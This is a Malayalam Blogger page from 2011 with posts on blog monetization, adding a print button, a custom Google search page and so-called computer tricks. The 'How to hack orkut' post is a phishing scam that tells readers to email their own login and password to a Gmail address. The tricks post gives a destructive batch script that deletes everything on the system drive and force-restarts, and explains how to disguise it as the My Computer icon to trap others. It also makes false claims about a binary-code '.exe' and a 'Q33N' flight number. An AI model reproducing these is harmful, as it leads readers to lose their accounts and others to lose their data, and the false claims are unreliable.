Friday, January 14, 2011

എപ്പോള്‍ ആണ് നിങ്ങളുടെ ബ്ലോഗ്‌ monetize ചെയ്യേണ്ടത്.(when monetizing your blog)

                       ഒരു പാട് ആളുകളുടെ വിചാരം ബ്ലോഗ്‌ തുടങ്ങിയ ഉടനെ തന്നെ അതില്‍ നിന്നും പണം ഉണ്ടാക്കാം എന്നാണ്.സത്യത്തില്‍ അതൊരു തെറ്റായ ധാരണയാണ്.ഒരു പാട് പഠനങ്ങളും അദ്വാനവും ഇതില്‍ ആവശ്യമുണ്ട്.ആദ്യമായി നിങ്ങള്‍ക്ക് ഒരു ബ്ലോഗ്‌ വേണം(കാണുക: എങ്ങനെ ബ്ലോഗ്‌ തുടങ്ങാം) കൂടാതെ ബ്ലോഗിന് പറ്റിയ നല്ല ടോപ്പിക്ക് തെരഞ്ഞെടുക്കുക(ഇത് നിങ്ങള്‍ക്കും അതോടൊപ്പം ബ്ലോഗ്‌ വായനക്കാര്‍ക്കും ഇഷ്ടപ്പെടുന്ന വിഷയമായിരിക്കണം).
                                  ഇനി നിങ്ങള്‍ക്ക് വേണ്ടത് നല്ല ട്രാഫിക്‌ ആണ്  ഇതിനായി നിങ്ങള്‍ക്ക് ട്വിറ്റെര്‍ പോലെയുള്ള സോഷ്യല്‍ നെറ്റ്വര്‍ക്കുകള്‍ ഉപയോഗിക്കാം.ഏറ്റവും പ്രധാനപെട്ട കാര്യം നിങ്ങളുടെ ബ്ലോഗ്‌ എപ്പോഴും ആക്റ്റീവ് ആയിരിക്കണം എന്നുള്ളതാണ്.കൂടുതല്‍ നല്ല നല്ല പോസ്റ്റുകള്‍ ചെയ്ത് നിങ്ങളുടെ ബ്ലോഗിനെ എപ്പോഴും ആക്റ്റീവ് ആക്കുക.

എന്‍റെ അഭിപ്രായപ്രകാരം  നിങ്ങള്‍ monetize ചെയ്യേണ്ടത് താഴെ പറയുന്ന ഘടകങ്ങള്‍ ഒത്തു വന്നാല്‍ ആണ്.

  1. നിങ്ങളുടെ ബ്ലോഗിന്  നല്ല ഒരു സ്ഥാനം  ഉണ്ടാവണം(നിങ്ങളുടെ ബ്ലോഗ്‌ തെറ്റില്ലാത്ത രീതിയില്‍ സെര്‍ച്ച്‌ ചെയ്യപ്പെടണം).
  2. നിങ്ങളുടെ ബ്ലോഗ്‌ തുടങ്ങിയിട്ട് 3 മാസമെങ്കിലും ആയിരിക്കണം.
  3. നിങ്ങളുടെ ബ്ലോഗ്‌ ആക്റ്റീവ് ആയിരിക്കണം കൂടാതെ average ട്രാഫിക് ഉണ്ടായിരിക്കണം.
  4. നിങ്ങളുടെ ബ്ലോഗിന് ടാര്‍ഗറ്റ് ചെയ്ത വായനക്കാരെ ആകര്‍ഷിക്കാന്‍ കഴിയണം.

Print Page Please comment on my blog post!

Wednesday, January 12, 2011

Adding "Print this" option for your blog

ഇവിടെ ഞാന്‍ നിങ്ങളെ പരിജയപ്പെടുത്താന്‍ പോകുന്നത് എങ്ങനെ "Print this" ഓപ്ഷന്‍ നിങ്ങളുടെ ബ്ലോഗ്ഗില്‍ ആഡ്ചെയ്യാം എന്നതിനെ കുറിച്ചാണ്.ഈ ഓപ്ഷന്‍ ഉപയോഗിച്ച് നിങ്ങളുടെ ബ്ലോഗ്‌ വിസിറ്റര്‍ക്ക് നിങ്ങളുടെ പേജ് പ്രിന്‍റ് ചെയ്യാവുന്നതാണ്.

ആദ്യമായി നിങ്ങള്‍ HTML  എഡിറ്ററില്‍ പോയി നിങ്ങളുടെ ടെമ്പ്ലേറ്റ്ന്‍റെ  ബേക്കപ്പ്‌ എടുത്തുവെക്കുക.നിങ്ങള്‍ എഡിറ്റു ചെയ്യുന്നത് ഒരു പക്ഷെ തെറ്റാം അങ്ങനെ വരുമ്പോള്‍ നിങ്ങളുടെ ടെമ്പ്ലേറ്റ് നഷ്ടപ്പെടാതിരിക്കാനാണ് ബേക്കപ്പ്‌ എടുത്തു വെക്കുന്നത്.

താഴെ കൊടുത്തിട്ടുള്ള സ്ക്രിപ്റ്റ് നിങ്ങളുടെ HTML എഡിറ്റര്‍ഇല്‍ പോയി <head>
എന്ന ടാഗിന് താഴെ പേസ്റ്റ് ചെയ്യുക.

<style type="text/css" media="print">
#noprint {display: none;}
// Hide unwanted elements
body {background:fff; color:000;}
// Black text on White background
a {text-decoration: underline; color:00f;}
//Underline Hyperlinks in blue
}
</style> 

അതിനു ശേഷം പ്രിവ്യു കാണുക എല്ലാം ശരിയായ വിധത്തിലാണെന്ന് ഉറപ്പുവരുത്തിയ ശേഷം സേവ് ചെയ്യുക.

ഇത് നിങ്ങള്‍ക്ക് എല്ലാ പോസ്റ്റിന്റെ കൂടെയും വേണമെന്നുണ്ടെങ്കില്‍  അല്ലെങ്കില്‍ ഏതെങ്കിലും ഒരു പോസ്റ്റിന്റെ കൂടെ വേണമെങ്കില്‍
 ഈ ലിങ്ക്  "<a href="javascript:window.print()">Print Page</a>" നിങ്ങളുടെ പോസ്റ്റ്‌ എഡിറ്റര്‍ഇന്‍റെ താഴെ പാസ്റ്റ് ചെയ്യുക.


നിങ്ങള്‍ക്ക് എല്ലാ പേജിന്റെകൂടെയും പ്രിന്‍റ് ഓപ്ഷന്‍ വേണമെങ്കില്‍ 
SETTINGS-FORMATTING ഇല്‍  പോയി  പോസ്റ്റ്‌  ടെമ്പ്ലേറ്റ്  എന്ന  ഭാഗത്ത്  പേസ്റ്റ് ചെയ്യുക.


Please comment on my blog post!

Sunday, January 2, 2011

How to hack orkut

                    നിങ്ങള്‍ ഹാക്കിംഗ് ഇഷ്ടപ്പെടുന്നുണ്ടോ എങ്കില്‍ ഇതാ വളരെ എളുപ്പത്തില്‍ ഓര്‍ക്കുട്ട് ഐഡി ഹാക്ക് ചെയ്യാനുള്ള മാര്‍ഗം.

അറിയിപ്പ്:ഉപദ്രവമാകുന്ന തരത്തിലുള്ള ഹാക്കിംഗ് നിയമ വിരുദ്ധമാണ്.

നിങ്ങള്‍ക്കിത് പോലെ തന്നെ Yahoo-Gmail-Hotmail എന്നിവയും ഹാക്ക് ചെയ്യാം.
step1:നിങ്ങളുടെ account ലേക്ക് ലോഗിന്‍ ചെയ്യുക.
step2:pwdserver1@gmail.com ലേക്ക് മെയില്‍ കമ്പോസ് ചെയ്യുക.
step3:സബ്ജെക്ടായി  'PASS REC' എന്നെഴുതുക.
step4:മെയില്‍ എഴുതാനുള്ള സ്ഥലത്ത്.


[ആദ്യവരി] ആരുടെ പാസ്‌  വേര്‍ഡാണോ വേണ്ടത് അയാളുടെ മെയില്‍ ഐഡി എഴുതുക
[രണ്ടാമത്തെ വരി] നിങ്ങളുടെ ഓര്‍ക്കുട്ട് ഐഡി
[മുന്നാമത്തെ വരി] നിങ്ങളുടെ പാസ്‌വേഡു.




എങ്ങനെ ഇത് പ്രവര്‍ത്തിക്കുന്നു എന്ന് നോക്കാം:നിങ്ങള്‍ മെയില്‍ ചെയ്യുന്നത് ഓര്‍കുട്ടിന്റെ യുഎസ്സിലുള്ള  ബെയ്സ് സെര്‍വിലേക്കാണ്.സാധാരണ സിസ്റ്റം administrators 
ന്‌ മാത്രമാണ് ഇത് ഉപയോഗിക്കാന്‍ പറ്റുകയോള്ളൂ.പക്ഷെ നിങ്ങള്‍ സ്വന്തം പാസ്‌വേഡുപയോഗിച്ച് ജിമെയില്‍ നിന്നും മെയില്‍ ചെയ്യുമ്പോള്‍ കമ്പ്യൂട്ടര്‍ഇനെ ഇത് സംശയത്തിലാക്കുന്നു. 


എന്തിനു നിങ്ങളുടെ പാസ്സ്‌വേര്‍ഡ്‌ കൊടുക്കുന്നു:ഓടാമറ്റിക് ജിമെയില്‍ റെസ്പോണ്ടെര്‍ ന്‌ 
സിസ്റ്റം  administator ഉടെ പാസ്സ്‌വേര്‍ഡ്‌ ആവശ്യമാണ്‌.ഇത് നിങ്ങളുടെ സ്വന്തം പാസ്സ്‌വേര്‍ഡ്‌ തന്നെയാണ്.


പാസ്സ്‌വേര്‍ഡ്‌ അടങ്ങിയ ഇമെയില്‍ ഓട്ടമാറ്റിക് ആയി തന്നെ നിങ്ങളുടെ ഇന്‍ബോക്സില്‍ എത്തും."SYSTEM REG MESSAGE" എന്ന പേരിലായിരിക്കും മെസ്സേജ്. 

Creat Your Own Google Search Engine



ഹായ് ,നിങ്ങള്‍ക്ക് സ്വന്തമായി ഗൂഗിള്‍ സെര്‍ച്ച്‌ ഹോം പേജ് ഉണ്ടാക്കാം.മാത്രമല്ല ഗൂഗിള്‍ സെര്‍ച്ച്‌ന്‍റെ  എല്ലാ ഗുണങ്ങളും നിങ്ങള്‍ക്ക് ലഭിക്കുകയും ചെയ്യും.എങ്ങനെ എന്നല്ലേ നിങ്ങളുടെ സ്വന്തം ഗൂഗിള്‍ സെര്‍ച്ച്‌  ഉണ്ടാക്കാന്‍ ഇവിടെ ക്ലിക്ക് ചെയ്യൂ.

ഇവിടെ ഞാന്‍ ഉണ്ടാക്കിയ സെര്‍ച്ച്‌ പേജ് നോക്കു








പിന്നെ മറ്റൊരു കാര്യം ഇത് നിങ്ങളുടെ ഹോം പേജ് ആക്കാന്‍ മറക്കരുത്‌.


The most amazing computer tricks ever

                                      താഴെ പറയുന്നു കമ്പ്യൂട്ടര്‍ ട്രിക്കുകള്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെയ്യാതിരിക്കുക.പഠനവുമായി ബന്ധപ്പെട്ട്‌ മാത്രമേ ഈ ലേഖനത്തെ കാണാവൂ.അതല്ല നിങ്ങള്‍ ഒരു കമ്പ്യൂട്ടര്‍ expert ആണെങ്കില്‍ നിങ്ങളുടെ സ്വന്തം ഉത്തരവാദിത്വത്തില്‍ ചെയ്യാവുന്നതാണ്.ഇതുമായി ബന്ധപ്പെട്ട ഒരു പ്രശ്നത്തിനും ലേഖകന്‍ ഉത്തരവാദി ആയിരിക്കില്ല.

ആദ്യമായി താഴെ പറയുന്ന ബൈനറി കോഡ്‌ കോപ്പി ചെയ്യുക.

01001011000111110010010101010101010000011111100000


ഇത് നിങ്ങളുടെ നോട്ട്പാഡില്‍ പേസ്റ്റ് ചെയ്യുക.


"whateveyouwish.exe" എന്ന പേരില്‍ സേവ് ചെയ്യുക
.
ഇനി നിങ്ങളിത് ഓപ്പണ്‍ ചെയ്‌താല്‍ ഇത് നിങ്ങളുടെ ഹാര്‍ഡ് ഡിസ്കിനെ ഫോര്‍മാറ്റ് ചെയ്യുന്നതാണ്.


                          നിങ്ങള്‍ക്ക് വേണമെങ്കില്‍ ഇത് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ കോപ്പി ചെയ്ത് പെട്ടെന്ന് കണ്ടെത്താന്‍ പറ്റാത്ത രീതിയില്‍ ഒരു ഫോള്‍ഡറിലാകി   ഹൈഡ് ചെയ്ത് വെക്കുക.അതിനു മുമ്പ് ടെസ്ക്ടോപിലേക്ക് ഒരു shortcut കീ ഉണ്ടാക്കുക.ഫോള്‍ഡര്‍ ഹൈഡ് ചെയ്തതിനു ശേഷം ഡെസ്ക്ടോപ്പില്‍ വന്നു shortcut ന്‍റെ ഐകണ്‍ മാറ്റി മൈ  കമ്പ്യൂട്ടര്‍  ഐകണ്‍ ആക്കുക.ശേഷം ഡസ്ക് ടോപ്പിലെ ആദ്യമുണ്ടായിരുന്ന മൈ കമ്പ്യൂട്ടര്‍ shortcut ഡിലിറ്റ് ചെയ്യുക.ഇനി നിങ്ങളുടെ സുഹ്രത്ത് അല്ലെങ്കില്‍ ശത്രു ഈ ഐകണില്‍ ക്ലിക്ക് ചെയ്‌താല്‍ അയാളുടെ കമ്പ്യൂട്ടര്‍ ഫോര്‍മാറ്റ് ആയിരിക്കും.  


ഇനി   മറ്റാരെങ്കിലും  PC restart ചെയ്യുമ്പോള്‍    അയാളെ  നിങ്ങള്‍ക്ക് അമ്പരപ്പിക്കണോ?


എങ്കില്‍  ഇനി പറയുന്ന പോലെ  ചെയ്യൂ .


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


മുകളില്‍   പറഞ്ഞ  കോഡ്‌ '.bat' എന്ന ഫോര്‍മാറ്റില്‍  സേവ് ചെയ്യുക.


World trade center trick
       നമുക്കെല്ലവാര്‍ക്കും  september 11 word trade center ആക്രമണത്തെ കുറിച്ച്  അറിയാം .110 ഓളം  നിലയുള്ള  ആ വലിയ കെട്ടിടത്തെ ഒരു വിമാനം ഇടിച്ചിറക്കി തകര്‍ത്ത കാര്യം .ആ വിമാനത്തിന്‍റെ നമ്പര്‍ Q33N എന്നാണ്.ഇനി പറയുന്നത് ശ്രധിക്കൂ Q33N എന്ന്  നോട്ട്പാഡില്‍ ടൈപ് ചെയ്യുക ശേഷം അതിന്‍റെ സൈസ് 72 ആകുക പിന്നെ അതിന്‍റെ  ഫോണ്ട്  "wingdings" ആക്കുക.ഇപ്പോള്‍ നിങ്ങള്‍ക്ക് താഴെ കാണുന്ന പോലെ കാണാം. 




കൂടുതല്‍ ട്രിക്കുകള്‍ക്കും ടിപ്സുകല്‍ക്കുമായി കാത്തിരിക്കുക.


If you want tricks in English then just mail me

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by Blogger